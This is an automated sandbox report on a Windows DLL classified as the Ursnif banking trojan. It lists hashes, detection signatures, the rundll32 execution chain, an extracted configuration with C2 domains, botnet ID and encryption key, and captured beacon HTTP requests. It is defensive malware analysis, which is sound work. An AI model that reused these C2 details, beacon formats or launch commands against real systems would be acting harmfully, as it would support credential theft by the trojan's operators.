Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report m87xfb63XU.dll

Overview

General Information

Sample Name:m87xfb63XU.dll
Analysis ID:500399
MD5:5aa733e108f0fa41df88cea0a309affe
SHA1:ce79918ca7845f2163360ea40a251912998ea226
SHA256:1be687a0453f23ea53b94a4447c926a9b4b6e01c2788e641b76eb4a5215bd960
Tags:BRTdllgeoGoziISFBITAUrsnif
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for domain / URL
Writes or reads registry keys via WMI
Writes registry values via WMI
Uses 32bit PE files
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • loaddll32.exe (PID: 6316 cmdline: loaddll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll' MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 4524 cmdline: cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 4536 cmdline: rundll32.exe 'C:\Users\user\Desktop\m87xfb63XU.dll',#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 4668 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,BeGrass MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4400 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4668 -s 632 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4596 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Fieldeight MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 4792 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4596 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • rundll32.exe (PID: 4348 cmdline: rundll32.exe C:\Users\user\Desktop\m87xfb63XU.dll,Often MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • WerFault.exe (PID: 6964 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 640 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000003.527111263.0000000003B28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000000.00000003.527630553.0000000003B28000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000000.00000003.615631858.00000000038AD000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.531230770.00000000055A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.531464419.00000000055A8000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 28 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.rundll32.exe.2eb0000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
              0.2.loaddll32.exe.3030000.0.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                0.2.loaddll32.exe.35794a0.1.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                  3.2.rundll32.exe.6e710000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                    0.2.loaddll32.exe.6e710000.2.unpackJoeSecurity_Ursnif_1Yara detected UrsnifJoe Security
                      Click to see the 13 entries

                      Sigma Overview

                      No Sigma rule has matched

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 00000003.00000003.454711091.0000000002E70000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"RSA Public Key": "UmEkthy8LQToWYBqtBaWyLn/P1d2KjpXi9nl2is1X7NEi7AW4Al92U7HvBiCwWHgXhs6UyTZ7q6npv3YCi+rPS7xAyorWWgcyyviEpE9CETDXviZ72XZkxmen4ztvEtct+obFAEe0tiXOsfOcC8xDsI0CHPpvmUknsexTYqAJgwcghgx1mGHx/yFM4fnPYw4mFFE6bVI7eMnbu1CuunRmAVRDHZ7MAS7zSkAmYjeo1zAzRnOEWgblRHwenmwlBtp0SFGuYCGVe3TZZ4Nndgpd5xpSeLOoSZi/fRXjtS8b6LXBS/zslRCRObMDjDX4pa1fM1uOgFHyvjANgWJpZ272bpOHjM52/hsEGZXskaNztU=", "c2_domain": ["msn.com/mail", "breuranel.website", "outlook.com/signup", "areuranel.website"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "0", "DGA_count": "10"}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: m87xfb63XU.dllVirustotal: Detection: 18%Perma Link
                      Source: m87xfb63XU.dllReversingLabs: Detection: 22%
                      Multi AV Scanner detection for domain / URLShow sources
                      Source: areuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: breuranel.websiteVirustotal: Detection: 6%Perma Link
                      Source: m87xfb63XU.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.82.28.61:443 -> 192.168.2.3:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.3:49784 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.223.66:443 -> 192.168.2.3:49785 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.151.2:443 -> 192.168.2.3:49786 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.97.153.146:443 -> 192.168.2.3:49787 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 52.97.135.82:443 -> 192.168.2.3:49788 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 40.101.60.226:443 -> 192.168.2.3:49789 version: TLS 1.2
                      Source: m87xfb63XU.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: WinTypes.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 0000000D.00000003.515702652.00000000052D6000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.542683798.0000000004EA1000.00000004.00000001.sdmp
                      Source: Binary string: sfc_os.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdb1 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb_ source: WerFault.exe, 0000000F.00000003.536214635.0000000004E83000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb4 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbHa source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: CoreMessaging.pdb source: WerFault.exe, 0000000F.00000003.536214635.0000000004E83000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: CoreMessaging.pdbK source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: rundll32.pdbk source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb) source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: oCReportStore::Prune: MaxReportCount=%d MaxSizeInMb=%dRSDSwkernel32.pdb source: WerFault.exe, 0000000D.00000002.533606421.0000000000D92000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000002.553574266.0000000000832000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000002.568560433.0000000000C92000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdbt source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: ntmarta.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: mpr.pdbH source: WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb8 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.542887533.0000000003126000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: mpr.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: iphlpapi.pdbb source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdb? source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK` source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: imagehlp.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: dwmapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb& source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: WinTypes.pdbM source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdbk source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000013.00000003.542799224.000000000311B000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdbb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ntmarta.pdbk source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb_ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: winspool.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: setupapi.pdb* source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: iphlpapi.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdbk source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdbKi source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdbK source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: msctf.pdb2 source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: ole32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: TextInputFramework.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: fltLib.pdb\ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: AcLayers.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wsspicli.pdbh source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: bcrypt.pdbh source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: c:\wheel\receive\Many-rise\score.pdb source: loaddll32.exe, 00000000.00000002.697038895.000000006E78B000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000002.698211502.000000006E78B000.00000002.00020000.sdmp, m87xfb63XU.dll
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: oleaut32.pdbz source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 0000000F.00000003.536346626.0000000004E74000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557031037.0000000005232000.00000004.00000040.sdmp
                      Source: Binary string: wUxTheme.pdb, source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb( source: WerFault.exe, 00000013.00000003.542887533.0000000003126000.00000004.00000001.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 0000000F.00000003.536314357.0000000004E70000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557113684.0000000005230000.00000004.00000040.sdmp
                      Source: Binary string: propsys.pdbn source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: rundll32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000013.00000003.542852774.0000000003121000.00000004.00000001.sdmp
                      Source: Binary string: oleaut32.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: sfc.pdb source: WerFault.exe, 0000000F.00000003.536169982.0000000004E77000.00000004.00000040.sdmp, WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: CoreUIComponents.pdb_ source: WerFault.exe, 00000013.00000003.557144035.0000000005237000.00000004.00000040.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 0000000D.00000003.521317987.0000000005581000.00000004.00000001.sdmp, WerFault.exe, 0000000F.00000003.536088621.0000000004D41000.00000004.00000001.sdmp, WerFault.exe, 00000013.00000003.556979768.0000000005261000.00000004.00000001.sdmp

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: areuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: breuranel.website
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.101.60.226 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.office365.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 52.97.135.82 187
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: msn.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeDomain query: www.outlook.com
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 40.97.153.146 187
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 13.82.28.61 187
                      Source: Joe Sandbox ViewASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS MICROSOFT-CORP-MSN-AS-BLOCKUS
                      Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                      Source: Joe Sandbox ViewIP Address: 40.97.153.146 40.97.153.146
                      Source: Joe Sandbox ViewIP Address: 13.82.28.61 13.82.28.61
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/881KeBhik38/n4I3jisQrsLf3N/5T7WW0TVyqLiEqrYpioXw/gsBY_2B0auYDQzqy/fq_2B0_2B1d5s1X/dE8U_2Bi9e1uHEa_2F/5gbQOA71j/4SGjjTuSnP5G5SL6XFKB/ya3reo77Dd0XJ5txbLh/Z2Jzwc_2FxPLynamqWy_2B/SzxjiUxPyCdZ8/5vaLjUU_/2FbRmdxDVJSYut_2BRUXs8y/S.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /mail/liopolo/I2vyCwQZ_2BZdOw7_2FC5/QHqYyNs8nTjA1r7w/N6UkSzFGkH0f_2F/1IQh_2Bz24bnmMcZ4_/2BpWpgK6a/MfYXdR3sp4DYLa3d1zd1/q_2BesRlkaXfNl4zUpH/oAvtXyz6Z7BEsY_2FVEEFG/s2tbS3iXa95no/TNlgDymJ/mAsry_2BV2k9xkYk3dzUg9O/zullnql4G3/M32YonxJQXyLafjIm/_2FKjkdabgYHJ/uSKzerPj.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: msn.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: outlook.com
                      Source: global trafficHTTP traffic detected: GET /signup/liopolo/Lf_2Fg8f5c_2BK6/Zu9U0t2ZcTswwewFAO/OEv2PKFbN/z8b4kNhG7zvHccOv8idc/Knnm9TAFaDWeAkZRt7S/s_2FJY_2FJZ_2FiFjgDZcG/X_2FPaS4UIfT5/mU_2B6qd/RThDpvlqtg_2B_2FquXT6Oc/rU7JT5JO40/2bdRvqEsO2i_2Fk7a/RPdp6h9XEAxz/UCoD0GwK5aa/_2BLPCSSipSRAr/lNUH_2BVSP8NW1a0oO1V8/mPc3sf.jre HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: www.outlook.com
